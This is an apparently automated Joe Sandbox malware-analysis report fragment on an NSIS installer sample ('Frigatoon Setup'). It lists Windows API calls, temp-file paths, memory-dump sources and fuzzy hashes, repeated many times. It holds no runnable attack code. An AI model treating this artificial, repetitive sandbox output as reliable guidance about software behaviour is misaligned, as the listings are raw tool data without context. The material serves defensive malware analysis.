                                                                  • API String ID: 3730416702-0
                                                                  • Opcode ID: 644c74f27a30c0de777d485295e2e042fd957a3cd262354bdf29028cf360103a
                                                                  • Instruction ID: 21e80bfaa55df9d1afa5f65c0e1d50691b181eb7c5a7ef8b91627228383cdf50
                                                                  • Opcode Fuzzy Hash: 644c74f27a30c0de777d485295e2e042fd957a3cd262354bdf29028cf360103a
                                                                  • Instruction Fuzzy Hash: B9416A72504300EFE321EFB0EC84B6EB7E9FB40B32F20481AF54686152D774AA45CB61
                                                                  APIs
                                                                  • GlobalAlloc.KERNEL32(00000040,00042C00,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004027F7
                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 00402813
                                                                  • GlobalFree.KERNEL32(?), ref: 0040284C
                                                                  • GlobalFree.KERNEL32(00000000), ref: 0040285F
                                                                  • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 00402877
                                                                  • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040288B
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                  • String ID:
                                                                  • API String ID: 2667972263-0
                                                                  • Opcode ID: 0982fd8cd03af43de4d89f950c9e5981b86a3d1c62601019d2fd9277b0c3e0b0
                                                                  • Instruction ID: 0817f1a76f2754a18340a64afdb33fa8ea80ebf39b88600e0ebdbe9b4451bd6d
                                                                  • Opcode Fuzzy Hash: 0982fd8cd03af43de4d89f950c9e5981b86a3d1c62601019d2fd9277b0c3e0b0
                                                                  • Instruction Fuzzy Hash: C3217C71C00124ABDF217FA9CD49DAE7F79EF09364B10823AF520762E1CA7959429F98
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1954804177.0000000070021000.00000020.00000001.01000000.00000006.sdmp, Offset: 70020000, based on PE: true
                                                                  • Associated: 00000000.00000002.1954777519.0000000070020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1954823374.0000000070023000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1954905655.0000000070025000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_70020000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: FreeGlobal
                                                                  • String ID:
                                                                  • API String ID: 2979337801-0
                                                                  • Opcode ID: b1e8a7d7a168ce10e0c3d148c682e8599d661da08927babee03f3dfc73a98512
                                                                  • Instruction ID: 127549feec88d67223c87326f53f2ec0c5383ce26c55aed568ab727de9e7750c
                                                                  • Opcode Fuzzy Hash: b1e8a7d7a168ce10e0c3d148c682e8599d661da08927babee03f3dfc73a98512
                                                                  • Instruction Fuzzy Hash: 5E51E832D04154AEDB129FB4FC546EEBBFBAB68A77F24005AE407A3305C6316D818752
                                                                  APIs
                                                                  • GetDlgItem.USER32(?), ref: 00401D58
                                                                  • GetClientRect.USER32(?,?), ref: 00401D9F
                                                                  • LoadImageA.USER32(?,?,?,?,?,?), ref: 00401DCD
                                                                  • SendMessageA.USER32(?,00000172,?,00000000), ref: 00401DDD
                                                                  • DeleteObject.GDI32(00000000), ref: 00401DF4
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                  • String ID:
                                                                  • API String ID: 1849352358-0
                                                                  • Opcode ID: 88d48bc7c248e4eb933a40af9007253b2681f99ee098487d3ae5cbff534abad4
                                                                  • Instruction ID: 73b34c0ea56e2209ca6b10ab4d69fe2665be34d6bb8fccc5b8c3de89ec824b9e
                                                                  • Opcode Fuzzy Hash: 88d48bc7c248e4eb933a40af9007253b2681f99ee098487d3ae5cbff534abad4
                                                                  • Instruction Fuzzy Hash: E8216672D00109AFDB05DF98DE44AEE7BB5FB48300F10407AF945F62A1CB789941CB58
                                                                  APIs
                                                                  • GetDC.USER32(?), ref: 00401E02
                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E1C
                                                                  • MulDiv.KERNEL32(00000000,00000000), ref: 00401E24
                                                                  • ReleaseDC.USER32(?,00000000), ref: 00401E35
                                                                  • CreateFontIndirectA.GDI32(0040B7E8), ref: 00401E84
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: CapsCreateDeviceFontIndirectRelease
                                                                  • String ID:
                                                                  • API String ID: 3808545654-0
                                                                  • Opcode ID: b39b666d990ace2a16a916a5a91e1be4de7d18ca3c58e3893634c66a591c9fc3
                                                                  • Instruction ID: 7256709fe02f9cd86de6692cc41f874bddf10922414536e302f1c0253df40f98
                                                                  • Opcode Fuzzy Hash: b39b666d990ace2a16a916a5a91e1be4de7d18ca3c58e3893634c66a591c9fc3
                                                                  • Instruction Fuzzy Hash: 3901B571900342AFE7019BB1AE49B997FB4EB55304F104439F251BB1E3CBB800059B6D
                                                                  APIs
                                                                  • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C7A
                                                                  • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C92
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Timeout
                                                                  • String ID: !
                                                                  • API String ID: 1777923405-2657877971
                                                                  • Opcode ID: c6d7f1a8d21ebdeb4ffd3b8fca0a359ba288ccf200932861a059a96450d8fb91
                                                                  • Instruction ID: 70c5dabd3ba5e8ff49a6b9f2e1e1e4e729e8b40939c30b800ff2ff7c816f6e1a
                                                                  • Opcode Fuzzy Hash: c6d7f1a8d21ebdeb4ffd3b8fca0a359ba288ccf200932861a059a96450d8fb91
                                                                  • Instruction Fuzzy Hash: 91216BB1944208BEEF06AFA4DD8AAAD7FB5EB44304F10447EF501B61D1C7B88640DB18
                                                                  APIs
                                                                  • lstrlenA.KERNEL32(0079F548,0079F548,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004047DF,000000DF,00000000,00000400,?), ref: 00404962
                                                                  • wsprintfA.USER32 ref: 0040496A
                                                                  • SetDlgItemTextA.USER32(?,0079F548), ref: 0040497D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: ItemTextlstrlenwsprintf
                                                                  • String ID: %u.%u%s%s
                                                                  • API String ID: 3540041739-3551169577
                                                                  • Opcode ID: 17aaa45ac1cbaaaffbe8dd61fb40f021ccac07db2aae94c567de9f3a79f05f34
                                                                  • Instruction ID: 7420f511cdb836142555688b3451de143ce73197971a19baf3312835e895797a
                                                                  • Opcode Fuzzy Hash: 17aaa45ac1cbaaaffbe8dd61fb40f021ccac07db2aae94c567de9f3a79f05f34
                                                                  • Instruction Fuzzy Hash: 0411DA736441283BEB10657D9C45EAF3298DB86374F260237FA26F31D1E979CC2251E8
                                                                  APIs
                                                                  • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsx6761.tmp,00000023,?,00000000,00000002,00000011,00000002), ref: 00402488
                                                                  • RegSetValueExA.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsx6761.tmp,00000000,?,00000000,00000002,00000011,00000002), ref: 004024C5
                                                                  • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsx6761.tmp,00000000,?,00000000,00000002,00000011,00000002), ref: 004025A9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: CloseValuelstrlen
                                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsx6761.tmp
                                                                  • API String ID: 2655323295-2667555261
                                                                  • Opcode ID: b93bb4b41e3f968b3a17595c186f125e9775901fc116c1543042db4b6de8d025
                                                                  • Instruction ID: d7f14aed55912e39ad141723e2cbb786b74cb62cb57f73557c42781e6368b2a7
                                                                  • Opcode Fuzzy Hash: b93bb4b41e3f968b3a17595c186f125e9775901fc116c1543042db4b6de8d025
                                                                  • Instruction Fuzzy Hash: BC119071E00218BEEB01EFA58E49EAE7BB5EB48314F21443BF504B72C1C6F85D419A18
                                                                  APIs
                                                                    • Part of subcall function 00405FED: lstrcpynA.KERNEL32(?,?,00000400,0040331A,Frigatoon Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 00405FFA
                                                                    • Part of subcall function 00405A1E: CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsj6A14.tmp,?,00405A8A,C:\Users\user\AppData\Local\Temp\nsj6A14.tmp,C:\Users\user\AppData\Local\Temp\nsj6A14.tmp,76F93410,?,C:\Users\user\AppData\Local\Temp\,004057D5,?,76F93410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405A2C
                                                                    • Part of subcall function 00405A1E: CharNextA.USER32(00000000), ref: 00405A31
                                                                    • Part of subcall function 00405A1E: CharNextA.USER32(00000000), ref: 00405A45
                                                                  • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsj6A14.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsj6A14.tmp,C:\Users\user\AppData\Local\Temp\nsj6A14.tmp,76F93410,?,C:\Users\user\AppData\Local\Temp\,004057D5,?,76F93410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405AC6
                                                                  • GetFileAttributesA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsj6A14.tmp,C:\Users\user\AppData\Local\Temp\nsj6A14.tmp,C:\Users\user\AppData\Local\Temp\nsj6A14.tmp,C:\Users\user\AppData\Local\Temp\nsj6A14.tmp,C:\Users\user\AppData\Local\Temp\nsj6A14.tmp,C:\Users\user\AppData\Local\Temp\nsj6A14.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsj6A14.tmp,C:\Users\user\AppData\Local\Temp\nsj6A14.tmp,76F93410,?,C:\Users\user\AppData\Local\Temp\,004057D5,?,76F93410,C:\Users\user\AppData\Local\Temp\), ref: 00405AD6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                  • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsj6A14.tmp
                                                                  • API String ID: 3248276644-3824364320
                                                                  • Opcode ID: 6e5c033a035c27754d6853607a5acda36fe127f80b162ed81d790e353b870010
                                                                  • Instruction ID: 48b42070403af27e20b1f5acdd7358d009e8e21f6fdf4bd1af3726bdd8170272
                                                                  • Opcode Fuzzy Hash: 6e5c033a035c27754d6853607a5acda36fe127f80b162ed81d790e353b870010
                                                                  • Instruction Fuzzy Hash: 2AF0A421215D6216D622323A1C89A9F1A58CEC7364709073FF866B12D3EA3C89439DAE
                                                                  APIs
                                                                  • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403235,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040345A,?,00000006,00000008,0000000A), ref: 0040598B
                                                                  • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403235,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040345A,?,00000006,00000008,0000000A), ref: 00405994
                                                                  • lstrcatA.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 004059A5
                                                                  Strings
                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405985
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: CharPrevlstrcatlstrlen
                                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                                  • API String ID: 2659869361-297319885
                                                                  • Opcode ID: dfed55a16eab86d89f3af7970decdd3a6c9dbbcd65d2cf450bad9cf681275afb
                                                                  • Instruction ID: 19b991fbecd43d68fcf8fbe3975c191da3a7c8eaa4a3e5077e024cb3b188d11e
                                                                  • Opcode Fuzzy Hash: dfed55a16eab86d89f3af7970decdd3a6c9dbbcd65d2cf450bad9cf681275afb
                                                                  • Instruction Fuzzy Hash: 8DD0A7A21059306AE20266159C09DDB19088F12315B060027F101B2191C63C0D1187FE
                                                                  APIs
                                                                  • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402C93
                                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402C9C
                                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402CBD
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: Close$Enum
                                                                  • String ID:
                                                                  • API String ID: 464197530-0
                                                                  • Opcode ID: c535ffd0503d7e53353de938b4ef0013261f8bb9891db40cf21ea401e86fa320
                                                                  • Instruction ID: 0ef75652e5200b2c3979a726b87f5b44e9bd6decc27dd8d038d5566faf8c77c7
                                                                  • Opcode Fuzzy Hash: c535ffd0503d7e53353de938b4ef0013261f8bb9891db40cf21ea401e86fa320
                                                                  • Instruction Fuzzy Hash: CC119A32504109FBEF129F90CF09B9E7B6DEB14380F204032BD45B61E0E7B59E11ABA8
                                                                  APIs
                                                                  • CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsj6A14.tmp,?,00405A8A,C:\Users\user\AppData\Local\Temp\nsj6A14.tmp,C:\Users\user\AppData\Local\Temp\nsj6A14.tmp,76F93410,?,C:\Users\user\AppData\Local\Temp\,004057D5,?,76F93410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405A2C
                                                                  • CharNextA.USER32(00000000), ref: 00405A31
                                                                  • CharNextA.USER32(00000000), ref: 00405A45
                                                                  Strings
                                                                  • C:\Users\user\AppData\Local\Temp\nsj6A14.tmp, xrefs: 00405A1F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
